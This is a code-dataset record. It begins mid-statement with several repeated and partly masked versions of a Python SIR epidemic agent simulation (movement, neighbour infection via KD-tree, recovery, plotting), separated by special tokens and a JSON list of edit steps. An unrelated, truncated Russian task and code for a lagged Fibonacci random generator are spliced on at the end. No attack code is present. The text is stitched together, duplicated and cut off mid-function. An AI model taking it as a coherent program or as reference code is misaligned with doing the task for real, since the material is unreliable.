20000 * math.pi)), startcorner=True)[0]
valuecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcenter=True)[0]
valuerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)))[0]
print('p = 0.05, starting randomly, the total infected number is ' + str(
valuerandom))
print('p = 0.05, starting from corner, the total infected number is ' + str
(valuecorner))
print('p = 0.05, starting from center, the total infected number is ' + str
(valuecenter))
<|reserved_special_token_1|>
import sys
import os
import numpy as np
import math
sys.path.append('../')
from sir.improveagent import *
import numpy as np
import numpy.linalg as la
import matplotlib.pyplot as plt
from scipy.spatial import KDTree
from scipy.spatial import cKDTree
from scipy.spatial.distance import pdist
import networkx as nx
p = Person()
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
run_Simulation2(0.6, N=20000, T=30, start=10)
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
plotcenterrange()
<|reserved_special_token_0|>
valuecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcorner=True)[0]
valuecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcenter=True)[0]
valuerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)))[0]
print('p = 0.05, starting randomly, the total infected number is ' + str(
valuerandom))
print('p = 0.05, starting from corner, the total infected number is ' + str
(valuecorner))
print('p = 0.05, starting from center, the total infected number is ' + str
(valuecenter))
<|reserved_special_token_1|>
import sys
import os
import numpy as np
import math
sys.path.append("../")
from sir.improveagent import *
import numpy as np
import numpy.linalg as la
import matplotlib.pyplot as plt
#from sklearn.neighbors import BallTree
from scipy.spatial import KDTree
from scipy.spatial import cKDTree
from scipy.spatial.distance import pdist
import networkx as nx
p = Person()
def run_Simulation2(k,N=100,T=10,start = 1,p=0.5,q=0.08,startcenter = False,startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N-start]
pop = [Person() for i in range(N)]
##we need to change the code for the case start people infected
for i in range(start):
pop[i].get_infected();
if(startcenter):
resetcenter(start,pop)
if(startcorner):
resetcorner(start,pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
#may have problem here
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand()< k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [i/N for i in recover]
newsuspect = [s/N for s in suspect]
newinfect = [i/N for i in infect]
plt.plot(range(T+1),newrecover,label = "r: percentage of removed ")
plt.plot(range(T+1),newsuspect,label = "s: percentage of susceptible")
plt.plot(range(T+1),newinfect,label = "i: percentage of infected")
plt.xlabel("T")
plt.ylabel("percentage")
plt.title("Percentage of Population, Discrete")
plt.legend()
plt.show()
#We run a simulation here,use the default value of p and q
run_Simulation2(0.6,N=20000,T = 30,start=10)
def checkinfectb(k,N,T,start=1,p=0.5,q=0.08,startcenter = False,startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N-start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected();
if(startcenter):
resetcenter(start,pop)
if(startcorner):
resetcorner(start,pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand()<k:
pop[j].get_recovered()
return np.array([(count_infect(pop)+count_recover(pop))/N,count_infect(pop)/N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02,0.1,0.02)
plist = np.arange(0.1,1,0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])
plt.plot(np.hstack((plist1,plist)),infectlist)
plt.title("centerplot")
plt.xlabel("p")
plt.ylabel("total number of individuals infected")
plt.title("Total Number of Individuals Infected vs p")
plt.show()
plotcenterrange()
"""
def plotrandomcornerrange():
plist1 = np.arange(0.02,0.1,0.02)
plist = np.arange(0.1,1,0.1)
infectlist = []
infectlist2 = []
infectlist3 = []
for i in plist1:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])
infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])
infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])
infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])
infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])
plt.plot(np.hstack((plist1,plist)),infectlist,label = "corner")
plt.plot(np.hstack((plist1,plist)),infectlist2,label = "random")
plt.plot(np.hstack((plist1,plist)),infectlist3,label = "center")
plt.title("Change from random corner center")
plt.xlabel("change of p")
plt.ylabel("change of total infected people")
plt.legend()
plt.show()
"""
#plotrandomcornerrange()
#no need for us to use this function
valuecorner = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0]
valuecenter = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0]
valuerandom = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)))[0]
print("p = 0.05, starting randomly, the total infected number is "+ str(valuerandom))
print("p = 0.05, starting from corner, the total infected number is "+ str(valuecorner))
print("p = 0.05, starting from center, the total infected number is "+ str(valuecenter))
|
flexible
|
{
"blob_id": "92317996f884befd646138cd3a3dc3f8345679f4",
"index": 2122,
"step-1": "<mask token>\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\n<mask token>\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append('../')\n<mask token>\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\nrun_Simulation2(0.6, N=20000, T=30, start=10)\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\nplotcenterrange()\n<mask token>\nprint('p = 0.05, starting randomly, the total infected number is ' + str(\n valuerandom))\nprint('p = 0.05, starting from corner, the total infected number is ' + str\n (valuecorner))\nprint('p = 0.05, starting from center, the total infected number is ' + str\n (valuecenter))\n",
"step-3": "<mask token>\nsys.path.append('../')\n<mask token>\np = Person()\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\nrun_Simulation2(0.6, N=20000, T=30, start=10)\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\nplotcenterrange()\n<mask token>\nvaluecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcorner=True)[0]\nvaluecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcenter=True)[0]\nvaluerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)))[0]\nprint('p = 0.05, starting randomly, the total infected number is ' + str(\n valuerandom))\nprint('p = 0.05, starting from corner, the total infected number is ' + str\n (valuecorner))\nprint('p = 0.05, starting from center, the total infected number is ' + str\n (valuecenter))\n",
"step-4": "import sys\nimport os\nimport numpy as np\nimport math\nsys.path.append('../')\nfrom sir.improveagent import *\nimport numpy as np\nimport numpy.linalg as la\nimport matplotlib.pyplot as plt\nfrom scipy.spatial import KDTree\nfrom scipy.spatial import cKDTree\nfrom scipy.spatial.distance import pdist\nimport networkx as nx\np = Person()\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\nrun_Simulation2(0.6, N=20000, T=30, start=10)\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\nplotcenterrange()\n<mask token>\nvaluecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcorner=True)[0]\nvaluecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcenter=True)[0]\nvaluerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)))[0]\nprint('p = 0.05, starting randomly, the total infected number is ' + str(\n valuerandom))\nprint('p = 0.05, starting from corner, the total infected number is ' + str\n (valuecorner))\nprint('p = 0.05, starting from center, the total infected number is ' + str\n (valuecenter))\n",
"step-5": "import sys\nimport os\nimport numpy as np\nimport math\nsys.path.append(\"../\")\nfrom sir.improveagent import *\nimport numpy as np\nimport numpy.linalg as la\nimport matplotlib.pyplot as plt\n#from sklearn.neighbors import BallTree\nfrom scipy.spatial import KDTree\nfrom scipy.spatial import cKDTree\nfrom scipy.spatial.distance import pdist\nimport networkx as nx\n\np = Person()\n\ndef run_Simulation2(k,N=100,T=10,start = 1,p=0.5,q=0.08,startcenter = False,startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N-start]\n pop = [Person() for i in range(N)]\n ##we need to change the code for the case start people infected\n for i in range(start):\n pop[i].get_infected();\n if(startcenter):\n resetcenter(start,pop)\n if(startcorner):\n resetcorner(start,pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n #may have problem here\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand()< k:\n pop[j].get_recovered()\n\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [i/N for i in recover]\n newsuspect = [s/N for s in suspect]\n newinfect = [i/N for i in infect]\n plt.plot(range(T+1),newrecover,label = \"r: percentage of removed \")\n plt.plot(range(T+1),newsuspect,label = \"s: percentage of susceptible\")\n plt.plot(range(T+1),newinfect,label = \"i: percentage of infected\")\n plt.xlabel(\"T\")\n plt.ylabel(\"percentage\")\n plt.title(\"Percentage of Population, Discrete\")\n plt.legend()\n plt.show()\n\n\n#We run a simulation here,use the default value of p and q\nrun_Simulation2(0.6,N=20000,T = 30,start=10)\n\ndef checkinfectb(k,N,T,start=1,p=0.5,q=0.08,startcenter = False,startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N-start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected();\n if(startcenter):\n resetcenter(start,pop)\n if(startcorner):\n resetcorner(start,pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand()<k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop)+count_recover(pop))/N,count_infect(pop)/N])\n\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02,0.1,0.02)\n plist = np.arange(0.1,1,0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])\n plt.plot(np.hstack((plist1,plist)),infectlist)\n plt.title(\"centerplot\")\n plt.xlabel(\"p\")\n plt.ylabel(\"total number of individuals infected\")\n plt.title(\"Total Number of Individuals Infected vs p\")\n plt.show()\n\nplotcenterrange()\n\n\n\n\"\"\"\ndef plotrandomcornerrange():\n\n plist1 = np.arange(0.02,0.1,0.02)\n plist = np.arange(0.1,1,0.1)\n infectlist = []\n infectlist2 = []\n infectlist3 = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])\n infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])\n infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])\n infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])\n infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])\n plt.plot(np.hstack((plist1,plist)),infectlist,label = \"corner\")\n plt.plot(np.hstack((plist1,plist)),infectlist2,label = \"random\")\n plt.plot(np.hstack((plist1,plist)),infectlist3,label = \"center\")\n plt.title(\"Change from random corner center\")\n plt.xlabel(\"change of p\")\n plt.ylabel(\"change of total infected people\")\n plt.legend()\n plt.show()\n\n\"\"\"\n#plotrandomcornerrange()\n#no need for us to use this function\n\nvaluecorner = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0]\nvaluecenter = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0]\nvaluerandom = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)))[0]\nprint(\"p = 0.05, starting randomly, the total infected number is \"+ str(valuerandom))\nprint(\"p = 0.05, starting from corner, the total infected number is \"+ str(valuecorner))\nprint(\"p = 0.05, starting from center, the total infected number is \"+ str(valuecenter))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from math import gcd
from random import randint, choice
task = """6. Реализовать алгоритм построения ПСП методом Фиббоначи с
запаздываниями. Обосновать выбор коэффициентов алгоритма. Для
начального заполнения использовать стандартную линейную конгруэнтную
ПСП с выбранным периодом. Реализовать возможность для пользователя
вводить коэффициенты заранее."""
def factor(n):
result = []
d = 2
while d * d <= n:
if n % d == 0:
result.append(d)
n //= d
else:
d += 1
if n > 1:
result.append(n)
return result
def get_coeff(period):
c = randint(0, period)
while gcd(c, period) != 1:
c += 1
b = 2
a = None
factor_result = factor(period)
while b <= period:
if all([b % p == 0 for p in factor_result]):
if period % 4 == 0:
if b % 4 == 0:
